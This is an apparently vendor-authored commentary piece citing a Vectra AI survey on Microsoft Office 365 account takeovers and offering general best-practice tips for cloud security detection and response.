The rapid adoption of cloud over the past year hasn’t just enabled businesses to continue operating seamlessly during a global crisis – it has also meant growing concerns of cybersecurity and securing remote work environments. Cloud and digital transformation still present transitional gaps and opportunities for adversaries to benefit from the speed and scale of adoption. With many organisations increasing their cloud software usage, Microsoft has dominated the productivity space with 115 million daily active users.
However, a new global study by Vectra AI has revealed that 71% of Microsoft Office 365 deployments suffered an average seven malicious account takeovers in the last 12 months to February 2021! The fact that three in four companies have experienced malicious account takeover attacks highlights the need to track and secure identities as they move from on-prem to the cloud. The confidence displayed by security decision-makers in their ability to prevent account takeover attacks is a stark contrast to the rising number of attacks and long dwell times.
With the new work-from-home paradigm, proliferation of data-driven applications, and
advancement of technologies such as artificial intelligence (AI) and Internet of Things (IoT) in the enterprise, cybercriminals too are using more advanced tools and sophisticated methods to attack organisations and breach privacy. User account takeover in Office 365 is the most effective way for an attacker to move laterally inside an organisation’s network. Cybercriminals rarely act alone – from sharing infrastructure to being part of entire syndicates dedicated to sabotage, forcing organisations to constantly review and renew their security policies.
Bridging the Knowledge Gap
In this landscape, enterprises are coming to realise that cyber threat defence and mitigation against increasingly sophisticated attacks are beyond the scope of an cybersecurity team. Constantly evolving threats means a round-the-clock effort and highly specialised skills to bolster enterprise cybersecurity, particularly within a hybrid cloud environment.
The survey also revealed that 80% of Singapore respondents and 96% of Australia and New Zealand survey respondents indicated their organisation’s cybersecurity risk had increased in 12 months to February 2021. As a result of increased Microsoft Office 365 usage during COVID-19, their main security concern is now the risk of data being comprised and the ability for hackers to hide their tracks by using legitimate Microsoft tools, such as Power Automate and e-Discovery. At a time when remote working is here for the long-term, the cyber threat attack surfaces (such as personal devices) and landscapes (new vulnerabilities) are getting wider, building a security-minded culture becomes a collective responsibility.
To better protect an organisation from inside and external threats, I’d like to share some best practice tips:
1. Apply a mix of subject matter experts and technology
It’s not enough to just invest in the tools but it matters to build knowledge and establish stringent governance frameworks. That’s where vendors with true cybersecurity expertise drive value, helping organisations not only to draw upon expertise and intelligent, AI-driven detection tools but to also gain deep visibility into security and compliance gaps.
2. Understand your threat landscape
It is imperative that organisation truly understand their new enterprise network. We have seen perimeters of the network vanish during 2020 as organisations have shifted to the cloud; the modern enterprise network is now Datacentre, IaaS, SaaS and PaaS. It is vital that the enterprise has visibility into all of these networks and be able to track attackers as they pivot through these environments. We must build detection and response capabilities that can shine a light into all these environments and track attacker behaviour as they attempt to move laterally through these environments.
3. Prioritise and respond at speed and scale
It is critical that enterprises can not only identify attackers as they pivot through the modern network, but they must have the ability to respond rapidly and in a consistent way across all network stacks be that IaaS, SaaS, PaaS, or Datacentre. The only way the enterprise can achieve this is via prioritisation of incidents leveraging AI and automation. This will then ensure that the limited capacity of the SOC will have the best chance to drive down metrics such as mean time to remediation, therefore reducing the impacts of attackers and reducing the risk of a widespread breach.
Building a secure organisation for the future
With scarcity of talent, many organisations struggle with experience shortfalls in their cybersecurity team. Entities need to focus on their networks and maintain good cyber hygiene to drive down the noise coming into security operation centres. Unless security investments are made into response capabilities, attacker responder gap will continue to grow. How quickly an entity responds to a breach and identifies the attacks quickly and effectively will determine who succeeds in this fast-changing time.